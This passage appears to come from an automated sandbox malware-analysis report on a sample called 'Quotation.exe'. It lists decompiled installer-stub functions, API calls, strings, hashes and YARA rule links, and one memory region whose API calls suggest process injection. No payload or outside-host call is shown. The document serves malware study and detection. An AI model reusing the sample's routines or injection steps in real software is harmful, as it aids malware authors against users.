                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 023D155E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.242149090.00000000023D0000.00000040.00000001.sdmp, Offset: 023D0000, based on PE: false
                                                Similarity
                                                • API ID: AllocCreateFileVirtual
                                                • String ID: 30639bd69681450488488c81e0395988
                                                • API String ID: 1475775534-2821137246
                                                • Opcode ID: 45b105b41addd7fe97fa26329b27e7f4e3038e9d7f1d82ea8bb1bba238630289
                                                • Instruction ID: 8a76dbb45b89fa4918d49127651beec8b44067f4bfba8910eedc35036d69caff
                                                • Opcode Fuzzy Hash: 45b105b41addd7fe97fa26329b27e7f4e3038e9d7f1d82ea8bb1bba238630289
                                                • Instruction Fuzzy Hash: FBE14A25D44388EEEF61CBE4EC05BEDBBB5AF04710F10409AF648FA1A1D7B50A84DB16
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 023D0705, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 023D0807
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 023D09D4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.242149090.00000000023D0000.00000040.00000001.sdmp, Offset: 023D0000, based on PE: false
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: 688943c21e02d1484c1314b1d16f0caa51ef4dafef6c5958fc25aaec8354b220
                                                • Instruction ID: 3f7a0145d7ae6198e5fda6febd97eda6f010645e7b29fa223db0c661019acad7
                                                • Opcode Fuzzy Hash: 688943c21e02d1484c1314b1d16f0caa51ef4dafef6c5958fc25aaec8354b220
                                                • Instruction Fuzzy Hash: 45A10136E00209EFEF14CFE4E985BADBBB1BF08715F20445AE554BA2A0D3749A90DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t27;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A9A(0xfffffff0);
				_t27 = E0040557B(_t25);
				if( *_t25 != __ebx && _t27 != __ebx) {
					do {
						_t29 = E00405513(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L5:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L5;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401428();
				} else {
					E00401428(0xffffffe6);
					E004059DB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                0x004015d5
                                                0x004015dc
                                                0x004015e6
                                                0x004015e8
                                                0x004015ee
                                                0x004015f6
                                                0x004015fc
                                                0x004015fe
                                                0x00401601
                                                0x00401609
                                                0x00401616
                                                0x00401623
                                                0x00401623
                                                0x00401618
                                                0x00401619
                                                0x00401621
                                                0x00000000
                                                0x00000000
                                                0x00401621
                                                0x00401616
                                                0x00401626
                                                0x00401629
                                                0x0040162b
                                                0x0040162c
                                                0x004015ee
                                                0x00401633
                                                0x00401653
                                                0x004021e8
                                                0x00401635
                                                0x00401637
                                                0x00401642
                                                0x00401648
                                                0x00401648
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                  • Part of subcall function 0040557B: CharNextA.USER32(1S@,?,0042BCA8,C:\Users\user\AppData\Local\Temp\,004055DF,0042BCA8,0042BCA8,?,?,00000000,00405331,?,"C:\Users\user\Desktop\Quotation.exe" ,00000000), ref: 00405589
                                                  • Part of subcall function 0040557B: CharNextA.USER32(00000000), ref: 0040558E
                                                  • Part of subcall function 0040557B: CharNextA.USER32(00000000), ref: 0040559D
                                                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 3751793516-1943935188
                                                • Opcode ID: b62097c57e7d34c826c8a34a39378d9677be106aa900e81be982e0e3289ee102
                                                • Instruction ID: afcdff62d0ef6905e8bdcee54b475e891262542c39ccdc99bb158fdd5f3a4caf
                                                • Opcode Fuzzy Hash: b62097c57e7d34c826c8a34a39378d9677be106aa900e81be982e0e3289ee102
                                                • Instruction Fuzzy Hash: BB012631908141ABDB213B755C449BF7BB0DA62774B68063FF8D1B22E2C63C49468A3F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004056DB, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004056DB(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                0x004056df
                                                0x004056e5
                                                0x004056e6
                                                0x004056e6
                                                0x004056e7
                                                0x004056ee
                                                0x004056f8
                                                0x00405705
                                                0x00405708
                                                0x00405710
                                                0x00000000
                                                0x00000000
                                                0x00405714
                                                0x00000000
                                                0x00000000
                                                0x00405716
                                                0x00000000
                                                0x00405716
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004056EE
                                                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403164,"C:\Users\user\Desktop\Quotation.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 00405708
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004056DE
                                                • nsa, xrefs: 004056E7
                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056DB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                • API String ID: 1716503409-768089442
                                                • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                • Instruction ID: 324ea9cf7fdad1bcdd77eed69f700b3778f381b3ee49d7efb620425ca15f8701
                                                • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                • Instruction Fuzzy Hash: 95F0203230C208BAEB104E19EC04B9B3F98DFD1720F10C03BFA089A1C0D2B0994897A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 023D0034, Relevance: 6.6, APIs: 4, Instructions: 552processthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 023D0373
                                                • GetThreadContext.KERNELBASE(?,00010007), ref: 023D0396
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 023D03BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.242149090.00000000023D0000.00000040.00000001.sdmp, Offset: 023D0000, based on PE: false
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThread
                                                • String ID:
                                                • API String ID: 2411489757-0
                                                • Opcode ID: f8bb52c6efbcc7965b59bb6a83c66d2ad2edf9ecd60bfef2daf6d73b0a10808a
                                                • Instruction ID: ccb26bd443e1a8903f8ac1fd1902734c1946bcb68079f62c90d1ab47d49073bb
                                                • Opcode Fuzzy Hash: f8bb52c6efbcc7965b59bb6a83c66d2ad2edf9ecd60bfef2daf6d73b0a10808a
                                                • Instruction Fuzzy Hash: C5321736E40218EFDB64CBA4EC55BADBBB5FF44B04F10449AE518FA2A0D7709A84CF15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403132, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E00403132(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
				E00405C17(_t6);
				_t2 = E00405554(_t6);
				if(_t2 != 0) {
					E004054E8(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056DB("\"C:\\Users\\alfons\\Desktop\\Quotation.exe\" ", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                0x00403133
                                                0x00403139
                                                0x0040313f
                                                0x00403146
                                                0x0040314b
                                                0x00403153
                                                0x0040315f
                                                0x00403165
                                                0x00403149
                                                0x00403149
                                                0x00403149

                                                APIs
                                                  • Part of subcall function 00405C17: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C6F
                                                  • Part of subcall function 00405C17: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C7C
                                                  • Part of subcall function 00405C17: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C81
                                                  • Part of subcall function 00405C17: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C91
                                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00403153
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Char$Next$CreateDirectoryPrev
                                                • String ID: "C:\Users\user\Desktop\Quotation.exe" $C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 4115351271-3285076056
                                                • Opcode ID: 9f26b915baf4af9ee834ce2d89a8bc0c97eabdbefea6e2b6526d35449a18764c
                                                • Instruction ID: 79f712b3a5127264f0764a8e69035eccad8d8fc9e3ddf1834021473dbb68359f
                                                • Opcode Fuzzy Hash: 9f26b915baf4af9ee834ce2d89a8bc0c97eabdbefea6e2b6526d35449a18764c
                                                • Instruction Fuzzy Hash: C0D0C92195AD3076D952362A3E06FCF154C8F5AB6AF529077F508B90C68B6C1AC309FE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401B71, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E00401B71(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x1c));
				_t30 =  *0x40b040; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x20)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x404); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E004059FD(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x24)));
						_t12 =  *0x40b040; // 0x0
						 *_t34 = _t12;
						 *0x40b040 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t30 + 4; // 0x4
							E004059DB(_t33, _t3);
							_push(_t30);
							 *0x40b040 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t30 == _t28) {
							break;
						}
						_t30 =  *_t30;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t30 == _t28) {
								break;
							} else {
								_t32 = _t30 + 4;
								E004059DB(0x409c40, _t30 + 4);
								_t22 =  *0x40b040; // 0x0
								E004059DB(_t32, _t22 + 4);
								_t25 =  *0x40b040; // 0x0
								_push(0x409c40);
								_push(_t25 + 4);
								E004059DB();
								L15:
								 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E004059FD(_t28, _t30, _t33, _t28, 0xffffffe8));
					E004052DB();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}













                                                0x00401b71
                                                0x00401b71
                                                0x00401b74
                                                0x00401b7c
                                                0x00401bc5
                                                0x00401bf3
                                                0x00401bfc
                                                0x00401bfe
                                                0x00401c02
                                                0x00401c07
                                                0x00401c0c
                                                0x00401c0e
                                                0x00401bc7
                                                0x00401bc9
                                                0x004026da
                                                0x00401bcf
                                                0x00401bcf
                                                0x00401bd4
                                                0x00401bdb
                                                0x00401bdc
                                                0x00401be1
                                                0x00401be1
                                                0x00401bc9
                                                0x00000000
                                                0x00401b7e
                                                0x00401b7e
                                                0x00401b7e
                                                0x00401b81
                                                0x00000000
                                                0x00000000
                                                0x00401b87
                                                0x00401b8b
                                                0x00000000
                                                0x00401b8d
                                                0x00401b8f
                                                0x00000000
                                                0x00401b95
                                                0x00401b95
                                                0x00401b9f
                                                0x00401ba4
                                                0x00401bae
                                                0x00401bb3
                                                0x00401bb8
                                                0x00401bbc
                                                0x00402855
                                                0x0040292f
                                                0x00402932
                                                0x00402938
                                                0x00402938
                                                0x00401b8f
                                                0x00000000
                                                0x00401b8b
                                                0x00402280
                                                0x0040228d
                                                0x0040228e
                                                0x00402293
                                                0x00402293
                                                0x0040293a
                                                0x0040293e

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 00401BE1
                                                • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Global$AllocFree
                                                • String ID: YVfgfgfgfgfg
                                                • API String ID: 3394109436-2960783394
                                                • Opcode ID: 4cb0680da1612d327d02e908c402c3bf8643f2045f08bdd5315ede493e019c16
                                                • Instruction ID: bd949401c8ecd51624a1a682cd912c9b1b8eabceb619d2a9202a94e4464cd785
                                                • Opcode Fuzzy Hash: 4cb0680da1612d327d02e908c402c3bf8643f2045f08bdd5315ede493e019c16
                                                • Instruction Fuzzy Hash: 0E2190F2A04505DBCB10EB95DE84A9F72B9EB44328721013BF612B32D1E77CA8459B6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040136D, Relevance: 3.1, APIs: 2, Instructions: 55windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 73%
                                                			E0040136D(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t8;
				int _t10;
				signed int _t12;
				int _t13;
				int _t14;
				signed int _t21;
				int _t24;
				signed int _t27;

				_t27 = _a4;
				while(_t27 >= 0) {
					_t8 = _t27 * 0x1c +  *0x42f450;
					__eflags =  *_t8 - 1;
					if( *_t8 == 1) {
						break;
					}
					_push(_t8); // executed
					_t10 = E00401439(); // executed
					__eflags = _t10 - 0x7fffffff;
					if(_t10 == 0x7fffffff) {
						return 0x7fffffff;
					}
					__eflags = _t10;
					if(__eflags < 0) {
						_t10 = E00405952(0x430000 - (_t10 + 1 << 0xa), 0x430000);
						__eflags = _t10;
					}
					if(__eflags != 0) {
						_t12 = _t10 - 1;
						_t21 = _t27;
						_t27 = _t12;
						_t13 = _t12 - _t21;
						__eflags = _t13;
					} else {
						_t13 = 1;
						_t27 = _t27 + 1;
					}
					__eflags = _a11;
					if(_a11 != 0) {
						 *0x42ec0c =  *0x42ec0c + _t13;
						_t14 =  *0x42ebf4; // 0x0
						__eflags = _t14;
						_t24 = (0 | _t14 == 0x00000000) + _t14;
						__eflags = _t24;
						SendMessageA(_a11, 0x402, MulDiv( *0x42ec0c, 0x7530, _t24), 0);
					}
				}
				return 0;
			}











                                                0x0040136e
                                                0x004013fb
                                                0x00401382
                                                0x00401384
                                                0x00401387
                                                0x00000000
                                                0x00000000
                                                0x00401389
                                                0x0040138a
                                                0x0040138f
                                                0x00401394
                                                0x00000000
                                                0x00401409
                                                0x00401396
                                                0x00401398
                                                0x004013a6
                                                0x004013ab
                                                0x004013ab
                                                0x004013ad
                                                0x004013b5
                                                0x004013b6
                                                0x004013b8
                                                0x004013ba
                                                0x004013ba
                                                0x004013af
                                                0x004013b1
                                                0x004013b2
                                                0x004013b2
                                                0x004013bc
                                                0x004013c1
                                                0x004013c3
                                                0x004013c9
                                                0x004013d2
                                                0x004013d7
                                                0x004013d7
                                                0x004013f5
                                                0x004013f5
                                                0x004013c1
                                                0x00000000

                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                                • SendMessageA.USER32 ref: 004013F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 52571e9a05d543f28becb04bb20ff3b97162573d1bf40450b7f866ea0ca4ed37
                                                • Instruction ID: cf07787b3771b01f225f0462f812935fb09dc15a82745279c290e788aa7168a4
                                                • Opcode Fuzzy Hash: 52571e9a05d543f28becb04bb20ff3b97162573d1bf40450b7f866ea0ca4ed37
                                                • Instruction Fuzzy Hash: A101DE727242109FE7185B3ADD09B3B26D8E714318F40423EF952E66F0E6B8EC028B49
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004056AC, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 68%
                                                			E004056AC(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                0x004056b0
                                                0x004056bd
                                                0x004056d2
                                                0x004056d8

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 004056B0
                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 004056D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
                                                • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004030E9, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004030E9(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                0x004030ed
                                                0x00403100
                                                0x00403108
                                                0x00000000
                                                0x0040310f
                                                0x00000000
                                                0x00403111

                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0C,000000FF,00000004,00000000,00000000,00000000), ref: 00403100
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                • Instruction ID: e81e275afb49510b14cdae0e049fdcddcae928b761bf1a0ea33109ac8d4bf1d9
                                                • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                • Instruction Fuzzy Hash: 03E08C32514118BBDF105E52DC01EE77B7CEB087A2F008032FD04EA191D631EE11DBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040311B, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040311B(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}




                                                0x00403129
                                                0x0040312f

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00403129
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
